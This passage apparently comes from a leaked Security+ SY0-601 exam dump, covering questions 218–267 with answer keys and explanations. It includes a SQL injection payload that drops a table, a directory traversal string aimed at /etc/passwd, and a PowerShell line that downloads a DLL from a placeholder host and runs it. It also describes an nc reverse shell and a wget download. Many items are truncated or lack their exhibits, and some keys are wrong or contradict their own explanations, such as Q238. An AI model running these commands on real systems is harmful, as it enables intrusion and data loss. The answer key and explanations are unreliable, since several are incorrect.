correlate, and analyze security logs and events from various devices on a network. SIEM can provide
better visibility into user activities by generating reports, alerts, dashboards, and metrics. SIEM can also
help detect and respond to security incidents, comply with regulations, and improve security posture.
218.A security administrator installed a new web server. The administrator did this to increase the
capacity for an application due to resource exhaustion on another server.
Which of the following algorithms should the administrator use to split the number of the connections on
each server in half?
A. Weighted response
B. Round-robin
C. Least connection
D. Weighted least connection
Answer: B
Explanation:
Round-robin is a type of load balancing algorithm that distributes traffic to a list of servers in rotation. It is
a static algorithm that does not take into account the state of the system for the distribution of tasks. It
assumes that all servers have equal capacity and can handle an equal amount of traffic.
219.While performing a threat-hunting exercise, a security analyst sees some unusual behavior
occurring in an application when a user changes the display name.
The security analyst decides to perform a static code analysis and receives the following pseudocode:
Which of the following attack types best describes the root cause of the unusual behavior?
A. Server-side request forgery
B. Improper error handling
C. Buffer overflow
D. SQL injection
Answer: D
Explanation:
SQL injection is one of the most common web hacking techniques. SQL injection is the placement of
malicious code in SQL statements, via web page input12. A SQL injection attack consists of insertion or
“injection” of a SQL query via the input data from the client to the application. A successful SQL injection
exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute
administration operations on the database (such as shutdown the DBMS), recover the content of a given
file present on the DBMS file system and in some cases issue commands to the operating system3.
According to the pseudocode given in the question, the application takes a user input for display name
88 / 142
The safer , easier way to help you pass any IT exams.
and concatenates it with a SQL query to update the user’s profile. This is a vulnerable practice that
allows an attacker to inject malicious SQL code into the query and execute it on the database.
For example, an attacker could enter something like this as their display name:
John'; DROP TABLE users; --
This would result in the following SQL query being executed:
UPDATE profile SET displayname = 'John'; DROP TABLE users; --' WHERE userid = 1; The semicolon
(;) terminates the original update statement and starts a new one that drops the users table. The double
dash (–) comments out the rest of the query. This would cause a catastrophic loss of data for the
application.
220.A network engineer receives a call regarding multiple LAN-connected devices that are on the same
switch. The devices have suddenly been experiencing speed and latency issues while connecting to
network resources. The engineer enters the command show mac address-table and reviews the
following output
Which of the following best describes the attack that is currently in progress?
A. MAC flooding
B. Evil twin
C. ARP poisoning
D. DHCP spoofing
Answer: C
Explanation:
This is an attempt to redirect traffic to an attacking host by sending an ARP packet that contains the
forged address of the next hop router. The attacker tricks the victim into believing that it is the legitimate
router by sending a spoofed ARP reply with its own MAC address. This causes the victim to send all its
traffic to the attacker instead of the router. The attacker can then intercept, modify, or drop the packets as
they please.
222.A security architect is designing the new outbound internet for a small company. The company would
like all 50 users to share the same single Internet connection. In addition, users will not be permitted to
89 / 142
The safer , easier way to help you pass any IT exams.
223.An organization has been experiencing outages during holiday sales and needs to ensure
availability of its point-of-sales systems. The IT administrator has been asked to improve both server-
data fault tolerance and site availability under high consumer load.
Which of the following are the best options to accomplish this objective? (Select two.)
A. Load balancing
B. Incremental backups
C. UPS
D. RAID
E. Dual power supply
F. VLAN
Answer: A,D
Explanation:
Load balancing and RAID are the best options to accomplish the objective of improving both server-data
fault tolerance and site availability under high consumer load. Load balancing is a method of distributing
network traffic across multiple servers to optimize performance, reliability, and scalability. Load balancing
can help improve site availability by preventing server overload, ensuring high uptime, and providing
redundancy and failover. RAID stands for redundant array of independent disks, which is a technology
that combines multiple physical disks into a logical unit to improve data storage performance, reliability,
and capacity. RAID can help improve server-data fault tolerance by providing data redundancy, backup,
and recovery.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.nginx.com/resources/glossary/load-balancing/ https://www.ibm.com/cloud/learn/raid
224.A systems engineer thinks a business system has been compromised and is being used to
exfiltrated data to a competitor. The engineer contacts the CSIRT The CSIRT tells the engineer to
90 / 142
The safer , easier way to help you pass any IT exams.
225.A major manufacturing company updated its internal infrastructure and just started to allow OAuth
application to access corporate data Data leakage is being reported.
Which of following most likely caused the issue?
A. Privilege creep
B. Unmodified default
C. TLS
D. Improper patch management
Answer: A
Explanation:
Privilege creep is the gradual accumulation of access rights beyond what an individual needs to do his or
her job. In information technology, a privilege is an identified right that a particular end user has to a
particular system resource, such as a file folder or virtual machine. Privilege creep often occurs when an
employee changes job responsibilities within an organization and is granted new privileges. While
employees may need to retain their former privileges during a period of transition, those privileges are
rarely revoked and result in an unnecessary accumulation of access privileges. Privilege creep creates a
security risk by increasing the attack surface and exposing sensitive data or systems to unauthorized or
malicious users.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.techtarget.com/searchsecurity/definition/privilege-creep
226.A retail store has a business requirement to deploy a kiosk computer In an open area The kiosk
computer's operating system has been hardened and tested. A security engineer IS concerned that
someone could use removable media to install a rootkit Mich of the should the security engineer
91 / 142
The safer , easier way to help you pass any IT exams.
227.Which of the following incident response phases should the proper collection of the detected 'ocs
and establishment of a chain of custody be performed before?
A. Containment
B. Identification
C. Preparation
D. Recovery
Answer: A
Explanation:
Containment is the phase where the incident response team tries to isolate and stop the spread of the
incident12. Before containing the incident, the team should collect and preserve any evidence that may
be useful for analysis and investigation12. This includes documenting the incident details, such as date,
time, location, source, and impact12. It also includes establishing a chain of custody, which is a record of
who handled the evidence, when, where, how, and why3. A chain of custody ensures the integrity and
admissibility of the evidence in court or other legal proceedings3.
228.A cybersecurity analyst at Company A is working to establish a secure communication channel with
a counter part at Company B, which is 3,000 miles (4.828 kilometers) away.
Which of the following concepts would help the analyst meet this goal m a secure manner?
A. Digital signatures
B. Key exchange
C. Salting
D. PPTP
Answer: B
Explanation:
Key exchange Short
Key exchange is the process of securely sharing cryptographic keys between two parties over a public
network. This allows them to establish a secure communication channel and encrypt their messages.
92 / 142
The safer , easier way to help you pass any IT exams.
There are different methods of key exchange, such as Diffie-Hellman or RSA. References:
https://www.comptia.org/content/guides/what-is-encryption
229.Which of the following would provide guidelines on how to label new network devices as part of the
initial configuration?
A. IP schema
B. Application baseline configuration
C. Standard naming convention policy
D. Wireless LAN and network perimeter diagram
Answer: C
Explanation:
A standard naming convention policy would provide guidelines on how to label new network devices as
part of the initial configuration. A standard naming convention policy is a document that defines the rules
and formats for naming network devices, such as routers, switches, firewalls, servers, or printers. A
standard naming convention policy can help an organization achieve consistency, clarity, and efficiency
in network management and administration.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Network_Virtualization/PathIsolationDesignG
uide/PathIsolationDesignGuide.pdf
230.A security administrator needs to provide secure access to internal networks for external partners.
The administrator has given the PSK and other parameters to the third-party security administrator.
Which of the following is being used to establish this connection?
A. Kerberos
B. SSL/TLS
C. IPSec
D. SSH
Answer: C
Explanation:
IPSec is a protocol suite that provides secure communication over IP networks. It uses encryption,
authentication, and integrity mechanisms to protect data from unauthorized access or modification.
IPSec can operate in two modes: transport mode and tunnel mode. In tunnel mode, IPSec can create a
virtual private network (VPN) between two endpoints, such as external partners and internal networks. To
establish a VPN connection, IPSec requires a pre-shared key (PSK) or other parameters to negotiate the
security association.
References: https://www.comptia.org/content/guides/what-is-vpn
93 / 142
The safer , easier way to help you pass any IT exams.
Answer: A
Explanation:
Memory management is a technique that can allocate and deallocate memory for applications and
processes. Memory management can reduce vulnerabilities by avoiding code reuse, which is a
technique that exploits a memory corruption vulnerability to execute malicious code that already exists in
memory. Memory management can prevent code reuse by implementing features such as address
space layout randomization (ASLR), data execution prevention (DEP), or stack canaries.
232.Physical access to the organization's servers in the data center requires entry and exit through
multiple access points: a lobby, an access control vestibule, three doors leading to the server floor itself
and eventually to a caged area solely for the organization's hardware.
Which of the following controls is described in this scenario?
A. Compensating
B. Deterrent
C. Preventive
D. Detective
Answer: C
Explanation:
The scenario describes preventive controls, which are designed to stop malicious actors from gaining
access to the organization's servers. This includes using multiple access points, such as a lobby, an
access control vestibule, and multiple doors leading to the server floor, as well as caging the
organization's hardware. According to the CompTIA Security+ SY0-601 document, preventive controls
are "designed to stop malicious actors from performing a malicious activity or gaining access to an
asset." These controls can include technical solutions, such as authentication and access control
systems, physical security solutions, such as locks and barriers, and administrative solutions such as
policy enforcement.
233.Which of the following can be used to calculate the total loss expected per year due to a threat
targeting an asset?
A. EF x asset value
B. ALE / SLE
C. MTBF x impact
D. SLE x ARO
Answer: D
Explanation:
The total loss expected per year due to a threat targeting an asset can be calculated using the Single
Loss Expectancy (SLE) multiplied by the Annualized Rate of Occurrence (ARO). SLE is the monetary
loss expected from a single event, while ARO is the estimated frequency of that event occurring in a
year.
Reference: CompTIA Security+ Study Guide: Exam SY0-501, 7th Edition, by Emmett Dulaney and
Chuck Easttom, Chapter 9: Risk Management, page 414.
234.DRAG DROP
Leveraging the information supplied below, complete the CSR for the server to set up TLS (HTTPS)
94 / 142
The safer , easier way to help you pass any IT exams.
• Hostname: ws01
• Domain: comptia.org
• IPv4: 10.1.9.50
• IPV4: 10.2.10.50
• Root: home.aspx
• DNS CNAME:homesite.
Instructions:
Drag the various data points to the correct locations within the CSR. Extension criteria belong in the let
hand column and values belong in the corresponding row in the right hand column.
Answer:
95 / 142
The safer , easier way to help you pass any IT exams.
235.A security operations center wants to implement a solution that can execute files to test for malicious
activity. The solution should provide a report of the files' activity against known threats.
Which of the following should the security operations center implement?
A. the Harvester
B. Nessus
C. Cuckoo
D. Sn1per
Answer: C
Explanation:
-----
Cuckoo is a sandbox that is specifically written to run programs inside and identify any malware. A
sandbox is a virtualized environment that isolates the program from the rest of the system and monitors
its behavior. Cuckoo can analyze files of various types, such as executables, documents, URLs, and
more. Cuckoo can provide a report of the files’ activity against known threats, such as network traffic, file
operations, registry changes, API calls, and so on.
A security operations center can implement Cuckoo to execute files to test for malicious activity and
generate a report of the analysis. Cuckoo can help the security operations center to detect and prevent
malware infections, investigate incidents, and perform threat intelligence.
236.An IT manager is estimating the mobile device budget for the upcoming year. Over the last five
years, the number of devices that were replaced due to loss, damage, or theft steadily increased by
10%.
Which of the following would best describe the estimated number of devices to be replaced next year?
A. SLA
96 / 142
The safer , easier way to help you pass any IT exams.
B. ARO
C. RPO
D. SLE
Answer: B
Explanation:
ARO stands for annualized rate of occurrence, which is a metric that estimates how often a threat event
will occur within a year. ARO can help an IT manager estimate the mobile device budget for the
upcoming year by multiplying the number of devices replaced in the previous year by the percentage
increase of replacement over the last five years. For example, if 100 devices were replaced in the
previous year and the replacement rate increased by 10% each year for the last five years, then the
estimated number of devices to be replaced next year is 100 x (1 + 0.1)^5 = 161.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.techopedia.com/definition/24866/annualized-rate-of-occurrence-aro
237.An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security
policy, all web-server ports except 443 should be disabled.
Which of the following can be
used to accomplish this task?
A. Application allow list
B. Load balancer
C. Host-based firewall
D. VPN
Answer: C
Explanation:
A host-based firewall is a software application that runs on each individual host and controls the
incoming and outgoing network traffic based on a set of rules. A host-based firewall can be used to block
or allow specific ports, protocols, IP addresses, or applications.
An engineer can use a host-based firewall to accomplish the task of disabling all web-server ports except
443 on a group of 100 web servers in a cloud environment. The engineer can configure the firewall rules
on each web server to allow only HTTPS traffic on port 443 and deny any other traffic. Alternatively, the
engineer can use a centralized management tool to deploy and enforce the firewall rules across all web
servers.
238.Users report access to an application from an internal workstation is still unavailable to a specific
server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is
successful between the two devices.
Which of the following tools should the security analyst use to help identify if the traffic is being blocked?
A. nmap
B. tracert
C. ping
D. ssh
Answer: A
97 / 142
The safer , easier way to help you pass any IT exams.
Explanation:
Tracert is a command-line tool that shows the route that packets take to reach a destination on a
network1. It also displays the time it takes for each hop along the way1. By using tracert, you can see if
there is a router or firewall that is blocking or slowing down the traffic between the internal workstation
and the specific server1.
239.While researching a data exfiltration event, the security team discovers that a large amount of data
was transferred to a file storage site on the internet.
Which of the following controls would work best to reduce the risk of further exfiltration using this
method?
A. Data loss prevention
B. Blocking IP traffic at the firewall
C. Containerization
D. File integrity monitoring
Answer: A
Explanation:
Data loss prevention (DLP) is a set of tools and processes that aim to prevent unauthorized access, use,
or transfer of sensitive data. DLP can help reduce the risk of further exfiltration using file storage sites on
the internet by monitoring and controlling data flows across endpoints, networks, and cloud services.
DLP can also detect and block attempts to copy, upload, or download sensitive data to or from file
storage sites based on predefined
policies and rules.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.microsoft.com/en-us/security/business/security-101/what-is-data-loss-prevention-dlp
240.A company is moving its retail website to a public cloud provider. The company wants to tokenize
audit card data but not allow the cloud provider to see the stored credit card information.
Which of the following would BEST meet these objectives?
A. WAF
B. CASB
C. VPN
D. TLS
Answer: B
Explanation:
CASB stands for cloud access security broker, which is a software tool or service that acts as an
intermediary between users and cloud service providers. CASB can help protect data stored in cloud
services by enforcing security policies and controls such as encryption, tokenization, authentication,
authorization, logging, auditing, and threat detection. Tokenization is a process that replaces sensitive
data with non-sensitive substitutes called tokens that have no intrinsic value. Tokenization can help
prevent data leakage by ensuring that only authorized users can access the original data using a
tokenization system.
References:
98 / 142
The safer , easier way to help you pass any IT exams.
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.cisco.com/c/en/us/products/security/what
241.A security engineer learns that a non-critical application was compromised. The most recent version
of the application includes a malicious reverse proxy while the application is running.
Which of the following should the engineer is to quickly contain the incident with the least amount of
impact?
A. Configure firewall rules to block malicious inbound access.
B. Manually uninstall the update that contains the backdoor.
C. Add the application hash to the organization's blocklist.
D. Tum off all computers that have the application installed.
Answer: C
Explanation:
A reverse proxy backdoor is a malicious reverse proxy that can intercept and manipulate the traffic
between the client and the web server3. This can allow an attacker to access sensitive data or execute
commands on the web server.
One possible way to quickly contain the incident with the least amount of impact is to add the application
hash to the organization’s blocklist. A blocklist is a list of applications or files that are not allowed to run
on a system or network. By adding the application hash to the blocklist, the security engineer can
prevent the malicious application from running and communicating with the reverse proxy backdoor.
242.An organization is concerned about hackers potentially entering a facility and plugging in a remotely
accessible Kali Linux box.
Which of the following should be the first lines of defense against such an attack? (Select TWO).
A. MAC filtering
B. Zero trust segmentation
C. Network access control
D. Access control vestibules
E. Guards
F. Bollards.
Answer: A,C
Explanation:
MAC filtering is a method of allowing or denying access to a network based on the MAC address of the
device attempting to connect. By creating a list of approved MAC addresses, the organization can
prevent unauthorized devices from connecting to the network.
Network Access Control (NAC) is a security solution that allows organizations to restrict access to their
networks based on the device's identity, configuration, and security posture.
This can be used to ensure that only legitimate devices are allowed to connect to the network, and any
unauthorized devices are blocked.
243.Which of the following should customers who are involved with Ul developer agreements be
concerned with when considering the use of these products on highly sensitive projects?
A. Weak configurations
99 / 142
The safer , easier way to help you pass any IT exams.
B. Integration activities
C. Unsecure user accounts
D. Outsourced code development
Answer: A
Explanation:
Customers who are involved with Ul developer agreements should be concerned with weak
configurations when considering the use of these products on highly sensitive projects. Weak
configurations can lead to security vulnerabilities, which can be exploited by malicious actors. It is
important to ensure that all configurations are secure and up-to-date in order to protect sensitive data.
Source: UL
244.A web server log contains two million lines. A security analyst wants to obtain the next 500 lines
starting from line 4,600.
Which of the following commands will help the security analyst to achieve this objective?
A. cat webserver.log | head -4600 | tail +500 |
B. cat webserver.log | tail -1995400 | tail -500 |
C. cat webserver.log | tail -4600 | head -500 |
D. cat webserver.log | head -5100 | tail -500 |
Answer: D
Explanation:
the cat command displays the contents of a file, the head command displays the first lines of a file, and
the tail command displays the last lines of a file. To display a specific number of lines from a file, you can
use a minus sign followed by a number as an option for head or tail. For example, head -10 will display
the first 10 lines of a file.
To obtain the next 500 lines starting from line 4,600, you need to use both head and tail commands.
https://www.professormesser.com/security-plus/sy0-601/sy0-601-video/file-manipulation-
tools/
245.An attacker is targeting a company. The attacker notices that the company’s employees frequently
access a particular website. The attacker decides to infect the website with malware and hopes the
employees’ devices will also become infected.
Which of the following techniques is the attacker using?
A. Watering-hole attack
B. Pretexting
C. Typosquatting
D. Impersonation
Answer: A
Explanation:
a watering hole attack is a form of cyberattack that targets a specific group of users by infecting websites
that they commonly visit123. The attacker seeks to compromise the user’s computer and gain access to
the network at the user’s workplace or personal data123. The attacker observes the websites often
visited by the victim or the group and infects those sites with malware14. The attacker may also lure the
user to a malicious site 4. A watering hole attack is difficult to diagnose and poses a significant threat to
websites and users2.
100 / 142
The safer , easier way to help you pass any IT exams.
246.A company is launching a website in a different country in order to capture user information
that a marketing business can use. The company itself will not be using the information.
Which
of the following roles is the company assuming?
A. Data owner
B. Data processor
C. Data steward
D. Data collector
Answer: D
Explanation:
A data collector is a person or entity that collects personal data from individuals for a specific purpose. A
data collector may or may not be the same as the data controller or the data processor, depending on
who determines the purpose and means of processing the data and who actually processes the data.
247.Unauthorized devices have been detected on the internal network. The devices’ locations were
traced to Ether ports located in conference rooms.
Which of the following would be the best technical controls to implement to prevent these devices from
accessing the internal network?
A. NAC
B. DLP
C. IDS
D. MFA
Answer: A
Explanation:
NAC stands for network access control, which is a security solution that enforces policies and controls
on devices that attempt to access a network. NAC can help prevent unauthorized devices from
accessing the internal network by verifying their identity, compliance, and security posture before
granting them access. NAC can also monitor and restrict the activities of authorized devices based on
predefined rules and roles. References: https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.cisco.com/c/en/us/products/security/what-is-network-access-control-nac.html
248.An organization's Chief Information Security Officer is creating a position that will be responsible for
implementing technical controls to protect data, including ensuring backups are properly maintained.
Which of the following roles would MOST likely include these responsibilities?
A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor
Answer: C
Explanation:
The role that would most likely include the responsibilities of implementing technical controls to protect
101 / 142
The safer , easier way to help you pass any IT exams.
data and ensuring backups are properly maintained would be a Backup Administrator. A Backup
Administrator is responsible for maintaining and managing an organization's backup systems and
procedures, which includes ensuring that backups are properly configured, tested and securely stored.
They are also responsible for the recovery of data in case of a disaster or data loss.
249.A security administrator is seeking a solution to prevent unauthorized access to the internal network.
Which of the following security solutions should the administrator choose?
A. MAC filtering
B. Anti-malware
C. Translation gateway
D. VPN
Answer: D
Explanation:
A VPN (virtual private network) is a secure tunnel used to encrypt traffic and prevent unauthorized
access to the internal network. It is a secure way to extend a private network across public networks,
such as the Internet, and can be used to allow remote users to securely access resources on the internal
network. Additionally, a VPN can be used to prevent malicious traffic from entering the internal network.
250.A security administrator Is evaluating remote access solutions for employees who are geographically
dispersed.
Which of the following would provide the MOST secure remote access? (Select TWO).
A. IPSec
B. SFTP
C. SRTP
D. LDAPS
E. S/MIME
F. SSL VPN
Answer: A,F
Explanation:
IPSec (Internet Protocol Security) is a technology that provides secure communication over the internet
by encrypting traffic and authenticating it at both the sender and receiver. It can be used to create secure
tunnels between two or more devices, allowing users to access resources securely and privately.
SSL VPN (Secure Sockets Layer Virtual Private Network) is a type of VPN that uses an SSL/TLS
connection to encrypt traffic between two or more devices. It is a secure and reliable solution for
providing remote access, as all traffic is encrypted and authenticated. Additionally, SSL VPNs can also
be used to restrict access to certain websites and services, making them a secure and robust solution for
remote access.
251.A company has hired an assessment team to test the security of the corporate network and
employee vigilance. Only the Chief Executive Officer and Chief Operating Officer are aware
of this exercise, and very little information has been provided to the assessors.
Which of the following is taking place?
A. A red-team test
B. A white-team test
102 / 142
The safer , easier way to help you pass any IT exams.
C. A purple-team test
D. A blue-team test
Answer: A
Explanation:
A red-team test is a type of security assessment that simulates a real-world attack on an organization’s
network, systems, applications, and people. The goal of a red-team test is to evaluate the organization’s
security posture, identify vulnerabilities and gaps, and test the effectiveness of its detection and
response capabilities. A red-team test is usually performed by a group of highly skilled security
professionals who act as adversaries and use various tools and techniques to breach the organization’s
defenses. A red-team test is often conducted without the knowledge or consent of most of the
organization’s staff, except for a few senior executives who authorize and oversee the exercise.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://cybersecurity.att.com/blogs/security-essentials/what-is-red-teaming
252.Audit logs indicate an administrative account that belongs to a security engineer has been locked
out multiple times during the day. The security engineer has been on vacation (or a few days.
Which of the following attacks can the account lockout be attributed to?
A. Backdoor
B. Brute-force
C. Rootkit
D. Trojan
Answer: B
Explanation:
The account lockout can be attributed to a brute-force attack. A brute-force attack is a type of attack
where an attacker attempts to guess a user's password by continually trying different combinations of
characters. In this case, it is likely that the security engineer's account was locked out due to an attacker
attempting to guess their password. Backdoor, rootkit, and Trojan attacks are not relevant in this
scenario.
253.A junior human resources administrator was gathering data about employees to submit to a new
company awards program. The employee data included job title business phone number location first
initial with last name and race.
Which of the following best describes this type of information?
A. Sensitive
B. Non-Pll
C. Private
D. Confidential
Answer: B
Explanation:
Non-PII stands for non-personally identifiable information, which is any data that does not directly identify
a specific individual. Non-PII can include information such as job title, business phone number, location,
first initial with last name, and race. Non-PII can be used for various purposes, such as statistical
103 / 142
The safer , easier way to help you pass any IT exams.
254.The findings in a consultant's report indicate the most critical risk to the security posture from an
incident response perspective is a lack of workstation and server investigation capabilities.
Which of the following should be implemented to remediate this risk?
A. HIDS
B. FDE
C. NGFW
D. EDR
Answer: D
Explanation:
EDR solutions are designed to detect and respond to malicious activity on workstations and servers, and
they provide a detailed analysis of the incident, allowing organizations to quickly remediate the threat.
According to the CompTIA Security+ SY0-601 Official Text Book, EDR solutions can be used to detect
malicious activity on endpoints, investigate the incident, and contain the threat. EDR solutions can also
provide real-time monitoring and alerting for potential security events, as well as detailed forensic
analysis for security incidents. Additionally, the text book recommends that organizations also implement
a host-based intrusion detection system (HIDS) to alert them to malicious activity on their workstations
and servers.
255.DRAG DROP
A data owner has been tasked with assigning proper data classifications and destruction methods for
various types of data contained within the environment.
104 / 142
The safer , easier way to help you pass any IT exams.
Answer:
Explanation:
Graphical user interface, application
Description automatically generated
256.A security team will be outsourcing several key functions to a third party and will require that:
• Several of the functions will carry an audit burden.
• Attestations will be performed several times a year.
• Reports will be generated on a monthly basis.
Which of the following BEST describes the document that is used to define these requirements and
stipulate how and when they are performed by the third party?
A. MOU
B. AUP
C. SLA
D. MSA
Answer: C
Explanation:
A service level agreement (SLA) is a contract between a service provider and a customer that outlines
105 / 142
The safer , easier way to help you pass any IT exams.
the services that are to be provided and the expected levels of performance. It is used to define the
requirements for the service, including any attestations and reports that must be generated, and the
timescales in which these must be completed. It also outlines any penalties for failing to meet these
requirements. SLAs are essential for ensuring that third-party services are meeting the agreed upon
performance levels.
Reference: CompTIA Security+ Study Guide: SY0-601 by Emmett Dulaney, Chuck Easttom
https://www.wiley.com/en-us/CompTIA+Security%2B+Study+Guide%3A+SY0-601-p-9781119515968
CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide by Darril Gibson
https://www.amazon.com/CompTIA-Security-Certified-Ahead-SY0-601/dp/1260117558
Note: SLA is the best document that is used to define these requirements and stipulate how and when
they are performed by the third party.
257.A security analyst reviews web server logs and finds the following string gallerys?file—. ./../../../../. .
/ . ./etc/passwd
Which of the following attacks was performed against the web server?
A. Directory traversal
B. CSRF
C. Pass the hash
D. SQL injection
Answer: A
Explanation:
Directory traversal is an attack that exploits a vulnerability in a web application or a file system to access
files or directories that are outside the intended scope. The attacker can use special characters, such
as …/ or …\ , to navigate through the directory structure and access restricted files or directories.
258.An employee received an email with an unusual file attachment named Updates . Lnk. A security
analysts reverse engineering what the fle does and finds that executes the folowing script:
C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg
-OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll
Which of the following BEST describes what the analyst found?
A. A Powershell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.
Answer: A
Explanation:
According to GitHub user JSGetty196’s notes1, a PowerShell code that uses rundll32.exe to execute a
DLL file is performing a DLL injection attack. This is a type of code injection attack that exploits the
Windows process loading mechanism. https://www.comptia.org/training/books/security-sy0-601-study-
guide
259.A company completed a vulnerability scan. The scan found malware on several systems that were
running older versions of Windows.
Which of the following is MOST likely the cause of the malware infection?
106 / 142
The safer , easier way to help you pass any IT exams.
A. Open permissions
B. Improper or weak patch management
C. Unsecure root accounts
D. Default settings
Answer: B
Explanation:
The reason for this is that older versions of Windows may have known vulnerabilities that have been
patched in more recent versions. If a company is not regularly patching their systems, they are leaving
those vulnerabilities open to exploit, which can allow malware to infect the systems.
It is important to regularly update and patch systems to address known vulnerabilities and protect
against potential malware infections. This is an important aspect of proper security management.
Here is a reference to the CompTIA Security+ certification guide which states that "Properly configuring
and maintaining software, including patch management, is critical to protecting systems and data."
Reference: CompTIA Security+ Study Guide: SY0-601 by Emmett Dulaney, Chuck Easttom
https://www.wiley.com/en-us/CompTIA+Security%2B+Study+Guide%3A+SY0-601-p-9781119515968
260.A security practitioner is performing due diligence on a vendor that is being considered for cloud
services.
Which of the following should the practitioner consult for the best insight into the
current security posture of the vendor?
A. PCI DSS standards
B. SLA contract
C. CSF framework
D. SOC 2 report
Answer: D
Explanation:
A SOC 2 report is a document that provides an independent assessment of a service organization’s
controls related to the Trust Services Criteria of Security, Availability, Processing Integrity, Confidentiality,
or Privacy. A SOC 2 report can help a security practitioner evaluate the current security posture of a
vendor that provides cloud services1.
261.A security administrator is managing administrative access to sensitive systems with the following
requirements:
• Common login accounts must not be used for administrative duties.
• Administrative accounts must be temporal in nature.
• Each administrative account must be assigned to one specific user.
• Accounts must have complex passwords.
" Audit trails and logging must be enabled on all systems.
Which of the following solutions should the administrator deploy to meet these requirements? (Give
Explanation and References from CompTIA Security+ SY0-601 Official Text Book and Resources)
A. ABAC
B. SAML
C. PAM
D. CASB
107 / 142
The safer , easier way to help you pass any IT exams.
Answer: C
Explanation:
PAM is a solution that enables organizations to securely manage users' accounts and access to
sensitive systems. It allows administrators to create unique and complex passwords for each user, as
well as assign each account to a single user for administrative duties. PAM also provides audit trails and
logging capabilities, allowing administrators to monitor user activity and ensure that all systems are
secure. According to the CompTIA Security+ SY0-601 Course Book, “PAM is the most comprehensive
way to control and monitor privileged accounts”.
262.HOTSPOT
An incident has occurred in the production environment.
Analyze the command outputs and identify the type of compromise.
Answer:
108 / 142
The safer , easier way to help you pass any IT exams.
Explanation:
Command Output1 = Logic Bomb
A logic bomb is a type of malicious code that executes when certain conditions are met, such as a
specific date or time, or a specific user action1. In this case, the logic bomb is a script that runs every
minute and checks if there is a user named john in the /etc/password file. If there is, it drops the
production database using a MySQL command3. This could cause severe damage to the system and
the data.
To prevent logic bombs, you should use antivirus software that can detect and remove malicious code,
and also perform regular backups of your data. You should also avoid opening suspicious attachments or
links from unknown sources, and use strong passwords for your accounts1.
Command Output2 = backdoorA backdoor is a type of malicious code that allows an attacker to access a
system or network remotely, bypassing security measures1. In this case, the backdoor is a script that
runs every time the date command is executed and prompts the user to enter their full name. Then, it
opens a reverse shell connection using the nc command and downloads a virus file from a malicious
website using the wget command2. This could allow the attacker to execute commands on the system
and infect it with malware.
To prevent backdoors, you should use antivirus software that can detect and remove malicious code,
and also update your system and applications regularly. You should also
avoid executing unknown commands or scripts from untrusted sources, and use firewall rules to block
unauthorized connections
109 / 142
The safer , easier way to help you pass any IT exams.
263.A security team suspects that the cause of recent power consumption overloads is the unauthorized
use of empty power outlets in the network rack.
Which of the following options will mitigate this issue without compromising the number of outlets
available?
A. Adding a new UPS dedicated to the rack
B. Installing a managed PDU
C. Using only a dual power supplies unit
D. Increasing power generator capacity
Answer: B
Explanation:
Installing a managed PDU is the most appropriate option to mitigate the issue without compromising the
number of outlets available. A managed Power Distribution Unit (PDU) helps monitor, manage, and
control power consumption at the rack level. By installing a managed PDU, the security team will have
greater visibility into power usage in the network rack, and they can identify and eliminate unauthorized
devices that consume excessive power from empty outlets.
https://www.comptia.org/training/books/security-sy0-601-study-guide
264.A candidate attempts to go to but accidentally visits http://comptiia.org. The malicious website looks
exactly like the legitimate website.
Which of the following best describes this type of attack?
A. Reconnaissance
B. Impersonation
C. Typosquatting
D. Watering-hole
Answer: C
Explanation:
Typosquatting is a type of cyberattack that involves registering domains with deliberately misspelled
names of well-known websites. The attackers do this to lure unsuspecting visitors to alternative websites,
typically for malicious purposes. Visitors may end up at these alternative websites by inadvertently
mistyping the name of popular websites into their web browser or by being lured by a phishing scam.
The attackers may emulate the look and feel of the legitimate websites and trick users into entering
sensitive information or downloading malware.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.kaspersky.com/resource-center/definitions/what-is-typosquatting
265.A new security engineer has started hardening systems. One o( the hardening techniques the
engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability lo
use SCP to transfer files to the NAS, even though the data is still viewable from the users' PCs.
Which of the following is the MOST likely cause of this issue?
A. TFTP was disabled on the local hosts.
B. SSH was turned off instead of modifying the configuration file.
C. Remote login was disabled in the networkd.conf instead of using the sshd. conf.
110 / 142
The safer , easier way to help you pass any IT exams.
266.A company needs to enhance Its ability to maintain a scalable cloud Infrastructure. The
Infrastructure needs to handle the unpredictable loads on the company's web application.
Which of the following cloud concepts would BEST these requirements?
A. SaaS
B. VDI
C. Containers
D. Microservices
Answer: C
Explanation:
Containers are a type of virtualization technology that allow applications to run in a secure, isolated
environment on a single host. They can be quickly scaled up or down as needed, making them an ideal
solution for unpredictable loads. Additionally, containers are designed to be lightweight and portable, so
they can easily be moved from one host to another.
Reference: CompTIA Security+ Sy0-601 official Text book, page 863.
267.Stakeholders at an organisation must be kept aware of any incidents and receive updates on status
changes as they occur.
Which of the following Plans would fulfill this requirement?
A. Communication plan
